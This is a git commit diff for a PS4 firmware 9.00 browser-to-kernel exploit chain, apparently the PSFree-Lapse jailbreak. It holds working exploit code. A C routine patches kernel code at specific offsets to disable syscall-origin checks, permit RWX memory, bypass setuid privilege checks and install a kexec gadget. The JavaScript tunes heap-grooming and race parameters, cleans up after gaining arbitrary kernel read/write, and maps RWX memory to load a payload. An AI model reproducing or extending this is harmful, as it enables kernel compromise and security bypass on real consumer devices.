Clean-Up & Abc Fix to Avoid KP

ABC fix is to avoid any KP after a succcess on Kernel Exploit w/o any errors. This patch does not improve the success rate.
2025-05-23 01:14:30 -06:00
parent 1b275030ee
commit b57bab46ab
6 changed files with 162 additions and 81 deletions
@@ -18,7 +18,7 @@ along with this program.  If not, see <https://www.gnu.org/licenses/>.
 <html>
    <head>
        <meta charset='utf-8'>
-        <title>PSFree-Lapse Exploit For 9.00</title>
+        <title>PSFree-Lapse Exploit For PS4 9.00</title>
        <style>
            @font-face {
                font-family: 'logging';
@@ -37,6 +37,6 @@ along with this program.  If not, see <https://www.gnu.org/licenses/>.
        source code and license.<br>
        <pre id='console'></pre>
    </body>
-    <script src="payload.js"></script>
+    <script src="./payload.js"></script>
    <script type='module' src='./alert.mjs'></script>
 </html>
@@ -15,6 +15,8 @@ GNU Affero General Public License for more details.
 You should have received a copy of the GNU Affero General Public License
 along with this program.  If not, see <https://www.gnu.org/licenses/>.  */

+// 9.00
+
 #include <stddef.h>

 #include "types.h"
@@ -53,55 +55,129 @@ void restore(struct kexec_args *uap) {

 void do_patch(void) {
    // offset to fast_syscall()
-    const size_t off_fast_syscall = 0x1C0;
-    void * const kbase = (void *)rdmsr(0xC0000082) - off_fast_syscall;
+    const size_t off_fast_syscall = 0x1c0;
+    void * const kbase = (void *)rdmsr(0xc0000082) - off_fast_syscall;

    disable_cr0_wp();
-    //ChendoChap Patches For 900
-    const size_t KERNEL_enable_syscalls_1 = 0x490;
-    const size_t KERNEL_enable_syscalls_2 = 0x4B5;
-    const size_t KERNEL_enable_syscalls_3 = 0x4B9;
-    const size_t KERNEL_enable_syscalls_4 = 0x4C2;
-    const size_t KERNEL_mprotect = 0x80B8D;
-    const size_t KERNEL_prx = 0x23AEC4;
-    const size_t KERNEL_mmap_1 = 0x16632A;
-    const size_t KERNEL_mmap_2 = 0x16632D;
-    const size_t KERNEL_dlsym_1 = 0x23B67F;
-    const size_t KERNEL_dlsym_2 = 0x221b40;
-    const size_t KERNEL_setuid = 0x1A06;
-    const size_t KERNEL_bzero = 0x2713FD;
-    const size_t KERNEL_pagezero = 0x271441;
-    const size_t KERNEL_memcpy = 0x2714BD;
-    const size_t KERNEL_pagecopy = 0x271501;
-    const size_t KERNEL_copyin = 0x2716AD;
-    const size_t KERNEL_copyinstr = 0x271B5D;
-    const size_t KERNEL_copystr = 0x271C2D;
-    const size_t KERNEL_veriPatch = 0x626874;
-    const size_t KERNEL_setcr0_patch = 0x3ade3B;
-    write32(kbase, KERNEL_enable_syscalls_1, 0);
-    write16(kbase, KERNEL_enable_syscalls_2, 0x9090);
-    write16(kbase, KERNEL_enable_syscalls_3, 0x9090);
-    write8(kbase, KERNEL_enable_syscalls_4, 0xEB);  
-    write8(kbase, KERNEL_mmap_1, 0x37);
-    write8(kbase, KERNEL_mmap_2, 0x37);
-    write32(kbase, KERNEL_mprotect, 0);      
-    write8(kbase, KERNEL_dlsym_1, 0xEB);
-    write32(kbase, KERNEL_dlsym_2, 0xC3C03148);
-    write8(kbase, KERNEL_setuid, 0xEB);
-    write16(kbase, KERNEL_prx, 0xE990);
-    write8(kbase, KERNEL_bzero, 0xEB);
-    write8(kbase, KERNEL_pagezero, 0xEB);
-    write8(kbase, KERNEL_memcpy, 0xEB);
-    write8(kbase, KERNEL_pagecopy, 0xEB);
-    write8(kbase, KERNEL_copyin, 0xEB);
-    write8(kbase, KERNEL_copyinstr, 0xEB);
-    write8(kbase, KERNEL_copystr, 0xEB);
-    write16(kbase, KERNEL_veriPatch, 0x9090);
-    write32(kbase, KERNEL_setcr0_patch, 0xC3C7220F);        
+
+    // patch amd64_syscall() to allow calling syscalls everywhere
+
+    // struct syscall_args sa; // initialized already
+    // u64 code = get_u64_at_user_address(td->tf_frame-tf_rip);
+    // int is_invalid_syscall = 0
+    //
+    // // check the calling code if it looks like one of the syscall stubs at a
+    // // libkernel library and check if the syscall number correponds to the
+    // // proper stub
+    // if ((code & 0xff0000000000ffff) != 0x890000000000c0c7
+    //     || sa.code != (u32)(code >> 0x10)
+    // ) {
+    //     // patch this to " = 0" instead
+    //     is_invalid_syscall = -1;
+    // }
+    write32(kbase, 0x490, 0);
+    // these code corresponds to the check that ensures that the caller's
+    // instruction pointer is inside the libkernel library's memory range
+    //
+    // // patch the check to always go to the "goto do_syscall;" line
+    // void *code = td->td_frame->tf_rip;
+    // if (libkernel->start <= code && code < libkernel->end
+    //     && is_invalid_syscall == 0
+    // ) {
+    //     goto do_syscall;
+    // }
+    //
+    // do_syscall:
+    //     ...
+    //     lea     rsi, [rbp - 0x78]
+    //     mov     rdi, rbx
+    //     mov     rax, qword [rbp - 0x80]
+    //     call    qword [rax + 8] ; error = (sa->callp->sy_call)(td, sa->args)
+    //
+    // sy_call() is the function that will execute the requested syscall.
+    write16(kbase, 0x4b5, 0x9090);
+    write16(kbase, 0x4b9, 0x9090);
+    write8(kbase, 0x4c2, 0xeb);
+
+    // patch sys_mmap() to allow rwx mappings
+
+    // patch maximum cpu mem protection: 0x33 -> 0x37
+    // the ps4 added custom protections for their gpu memory accesses
+    // GPU X: 0x8 R: 0x10 W: 0x20
+    // that's why you see other bits set
+    // ref: https://cturt.github.io/ps4-2.html
+    write8(kbase, 0x16632a, 0x37);
+    write8(kbase, 0x16632d, 0x37);
+
+    // patch vm_map_protect() (called by sys_mprotect()) to allow rwx mappings
+    //
+    // this check is skipped after the patch
+    //
+    // if ((new_prot & current->max_protection) != new_prot) {
+    //     vm_map_unlock(map);
+    //     return (KERN_PROTECTION_FAILURE);
+    // }
+    write32(kbase, 0x80b8d, 0);
+
+    // patch sys_dynlib_dlsym() to allow dynamic symbol resolution everywhere
+
+    // call    ...
+    // mov     r14, qword [rbp - 0xad0]
+    // cmp     eax, 0x4000000
+    // jb      ... ; patch jb to jmp
+    write8(kbase, 0x23b67f, 0xeb);
+    // patch called function to always return 0
+    //
+    // sys_dynlib_dlsym:
+    //     ...
+    //     mov     edi, 0x10 ; 16
+    //     call    patched_function ; kernel_base + 0x951c0
+    //     test    eax, eax
+    //     je      ...
+    //     mov     rax, qword [rbp - 0xad8]
+    //     ...
+    // patched_function: ; patch to "xor eax, eax; ret"
+    //     push    rbp
+    //     mov     rbp, rsp
+    //     ...
+    write32(kbase, 0x221b40, 0xc3c03148);
+
+    // patch sys_setuid() to allow freely changing the effective user ID
+
+    // ; PRIV_CRED_SETUID = 50
+    // call priv_check_cred(oldcred, PRIV_CRED_SETUID, 0)
+    // test eax, eax
+    // je ... ; patch je to jmp
+    write8(kbase, 0x1a06, 0xeb);
+
+    // overwrite the entry of syscall 11 (unimplemented) in sysent
+    //
+    // struct args {
+    //     u64 rdi;
+    //     u64 rsi;
+    //     u64 rdx;
+    //     u64 rcx;
+    //     u64 r8;
+    //     u64 r9;
+    // };
+    //
+    // int sys_kexec(struct thread td, struct args *uap) {
+    //     asm("jmp qword ptr [rsi]");
+    // }
+
+    // sysent[11]
    const size_t offset_sysent_11 = 0x1100520;
-    write32(kbase, offset_sysent_11, 2);
+    // .sy_narg = 6
+    write32(kbase, offset_sysent_11, 6);
+    // .sy_call = gadgets['jmp qword ptr [rsi]']
    write64(kbase, offset_sysent_11 + 8, kbase + 0x4c7ad);
+    // .sy_thrcnt = SY_THR_STATIC
    write32(kbase, offset_sysent_11 + 0x2c, 1);

+    //veriPatch
+    const size_t KERNEL_veriPatch = 0x626874;
+
+    write16(kbase, KERNEL_veriPatch, 0x9090);
+
    enable_cr0_wp();
 }
@@ -133,7 +133,7 @@ const main_core = 7;
 const num_grooms = 0x200;
 const num_handles = 0x100;
 const num_sds = 0x100; // max is 0x100 due to max IPV6_TCLASS
-const num_alias = 40;
+const num_alias = 10;
 const num_races = 100;
 const leak_len = 16;
 const num_leaks = 5;
@@ -141,6 +141,7 @@ const num_clobbers = 8;

 let chain = null;
 var nogc = [];
+
 async function init() {
    await rop.init();
    chain = new Chain();
@@ -1458,28 +1459,23 @@ function make_kernel_arw(pktopts_sds, dirty_sd, k100_addr, kernel_addr, sds) {
    }
    log('achieved arbitrary kernel read/write');

-    // RESTORE: clean corrupt pointers
+    // RESTORE: clean corrupt pointer
     // pktopts.ip6po_rthdr = NULL
+     //ABC Patch
     const off_ip6po_rthdr = 0x68;
     const r_rthdr_p = r_pktopts.add(off_ip6po_rthdr);
-    log(`reclaim rthdr: ${kmem.read64(r_rthdr_p)}`);
-    kmem.write64(r_rthdr_p, 0);
-    log(`reclaim rthdr: ${kmem.read64(r_rthdr_p)}`);
-
     const w_rthdr_p = w_pktopts.add(off_ip6po_rthdr);
-    log(`reclaim rthdr: ${kmem.read64(w_rthdr_p)}`);
-    log(kmem.read64(w_rthdr_p));
-    log(`reclaim rthdr: ${kmem.read64(w_rthdr_p)}`);
-
+     kmem.write64(r_rthdr_p, 0);
+     kmem.write64(w_rthdr_p, 0);
     log('corrupt pointers cleaned');

-    
+    /*
    // REMOVE once restore kernel is ready for production
    // increase the ref counts to prevent deallocation
    kmem.write32(main_sock, kmem.read32(main_sock) + 1);
    kmem.write32(worker_sock, kmem.read32(worker_sock) + 1);
    // +2 since we have to take into account the fget_write()'s reference
-    kmem.write32(pipe_file.add(0x28), kmem.read32(pipe_file.add(0x28)) + 2);
+    kmem.write32(pipe_file.add(0x28), kmem.read32(pipe_file.add(0x28)) + 2);*/
    
    return [kbase, kmem, p_ucred, [kpipe, pipe_save, pktinfo_p, w_pktinfo]];
 }
@@ -1601,6 +1597,8 @@ async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
    alert("kernel exploit succeeded!");
 }

+
+
 // FUNCTIONS FOR STAGE: SETUP

 function setup(block_fd) {
@@ -1641,17 +1639,6 @@ function setup(block_fd) {
    // allocate enough so that we start allocating from a newly created slab
    spray_aio(num_grooms, greqs.addr, num_reqs, groom_ids_p, false);
    cancel_aios(groom_ids_p, num_grooms);        
-    {
-        // chosen to maximize the number of 0x100 malloc allocs per submission
-        const num_reqs = 4;
-        const groom_ids = new View4(num_grooms);
-        const groom_ids_p = groom_ids.addr;
-        const greqs = make_reqs1(num_reqs);
-        // allocate enough so that we start allocating from a newly created slab
-        spray_aio(num_grooms, greqs.addr, num_reqs, groom_ids_p, false);
-        cancel_aios(groom_ids_p, num_grooms);
-    }
-        
    return [block_id, groom_ids];
 }

@@ -1671,6 +1658,15 @@ export async function kexploit() {
    await init();
    const _init_t2 = performance.now();

+    // If setuid is successful, we dont need to run the kexploit again
+    try {
+        if (sysi('setuid', 0) == 0) {
+            log("Not running kexploit again.")
+            return;
+        }
+    }
+    catch (e) {}
+
    // fun fact:
    // if the first thing you do since boot is run the web browser, WebKit can
    // use all the cores
@@ -1724,6 +1720,7 @@ export async function kexploit() {

        log('\nSTAGE: Patch kernel');
        await patch_kernel(kbase, kmem, p_ucred, restore_info);
+        
    } finally {
        close(unblock_fd);

@@ -1745,7 +1742,6 @@ export async function kexploit() {
    }
 }

-kexploit().then(() => {
 function malloc(sz) {
        var backing = new Uint8Array(0x10000 + sz);
        nogc.push(backing);
@@ -1761,6 +1757,10 @@ kexploit().then(() => {
        ptr.backing = new Uint32Array(backing.buffer);
        return ptr;
    }
+
+
+kexploit().then(() => {
+    
    window.pld_size = new Int(0x26200000, 0x9);

    var payload_buffer = chain.sysp('mmap', window.pld_size, 0x300000, 7, 0x41000, -1, 0);
@@ -1781,4 +1781,9 @@ kexploit().then(() => {
        payload_loader,
        payload_buffer,
    );
+
+
+    
+
+
 })
@@ -34,7 +34,7 @@ along with this program.  If not, see <https://www.gnu.org/licenses/>.  */
 //     needed offsets on different firmwares (PS5).

 import { Int } from './module/int64.mjs';
-import { Memory } from './module/mem.mjs';
+import { Memory,mem } from './module/mem.mjs';
 import { KB, MB } from './module/offset.mjs';
 import { BufferView } from './module/rw.mjs';